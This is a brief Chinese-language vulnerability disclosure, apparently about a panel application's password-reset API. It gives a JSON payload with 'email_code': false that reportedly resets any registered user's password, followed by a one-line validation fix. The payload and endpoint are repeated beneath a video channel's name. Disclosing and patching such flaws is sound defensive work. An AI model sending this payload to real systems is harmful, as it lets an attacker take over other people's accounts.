复现方式:
API端点:
api/v1/passport/auth/forget
Payload:
{
"email":"任意一个已注册用户",
"password": "密码",
"email_code": false
}
即可重置对应账户密码
最小改动修复方式:
app/Http/Requests/Passport/AuthForget.php找到'email_code' => 'required'
改成'email_code' => 'required|string|digits:6'
🏭 🏭遙ラボ @harukalab · 1.23K subscribers api/v1/passport/auth/forget
Payload:
{
"email":"任意一个已注册用户",
"password": "密码",
"email_code": false
}
app/Http/Requests/Passport/AuthForget.php